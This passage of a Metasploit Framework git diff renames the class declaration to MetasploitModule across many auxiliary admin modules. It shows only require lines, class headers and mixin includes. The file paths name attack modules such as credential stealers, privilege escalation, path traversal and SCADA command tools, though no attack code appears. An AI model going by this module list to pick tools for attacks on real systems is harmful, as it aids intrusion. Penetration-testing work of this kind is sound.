Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index ee19d364b1..8162fb9b44 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index ed9226caa4..78a9a2cee8 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index f010b3f631..00ebbc8800 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 308d928a81..38d7e8b2a8 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b987960189..a01e9ce969 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index ae1f0a6a32..bbe5f28383 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 5e5043da0e..043fb814b9 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index dd8fb6ca8c..89ab23faa7 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 3e43c502d6..90f8a5105c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 69db942e3a..1958ef82f4 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'thread' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index e908b1bd14..596d5a0806 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index bba990712d..93b7c1351b 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index 21cb5b66ce..46f6a33d20 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 4051e0baa5..3897eb9730 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 25c01c9f28..e60e2c2049 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb index ec3ce10323..d920351496 100644 --- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb +++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb index 6c8f0d29c3..a9ed6fac2d 100644 --- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb +++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Kerberos::Client diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 27b931c1a7..fb9f275d2f 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 170a40091e..e52ab58061 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/misc/wol.rb b/modules/auxiliary/admin/misc/wol.rb index 8afcd0100e..276d8fe96d 100644 --- a/modules/auxiliary/admin/misc/wol.rb +++ b/modules/auxiliary/admin/misc/wol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 187b8a7d25..2b0f191a33 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index d067729154..326a510db4 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b7272a17cc..02688eded2 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb index 27ad860676..dd4f419e52 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index dc6b36654f..aef9b655ff 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index dd90b59eef..be1343ef33 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb index f691a81169..254d745a02 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 95bc7a1694..979886b01e 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index bd5d6ade57..4862f91e68 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 9a4493717f..e47f479dc2 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index c81ae1b467..bd8f29568e 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 976ce09e8b..b90a4353fe 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index f97100c2e9..262375cd2f 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 689739c228..117abf5007 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 4b4c796a25..446dea3009 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 0ace058218..c6b54c2c7a 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 8c64f49cca..8cfa8c907b 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 5bb0e6830f..f4c7d52c2a 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 56578fa36f..e8dfd5f1ad 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index 731a58e444..07010cf1bc 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 8ec139cec0..07f3cc5b19 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index c9b9faccbb..4d5d54817d 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index e33a0db012..851ce5950a 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index ee9efbb905..1a49166ddc 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 44e67f20d0..944e24c56a 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 581c65d9ac..2aa1311ec6 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 94a16f0d72..db6cfd7896 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index d9355644a7..fae25f3308 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index c5f9453f72..0e3e355eab 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index a9140ed59d..b22eb782cb 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index d7e50deacb..6a45802bf0 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 61c7a66ec0..ef2a7e452b 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d8e837f799..ba24fc2314 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index fa3abf8d31..2f2dd5bbd8 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 9a811c4d1d..4d588e1f2b 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres diff --git a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb index 43f91cf73e..39dd75f68e 100644 --- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb +++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 383b187968..23d106176d 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 684d043437..b3a912e0b1 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index 2251e33566..0325a8274b 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 53bf52ea84..fd29955621 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index aabbdc4cc3..1d91e140a4 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git 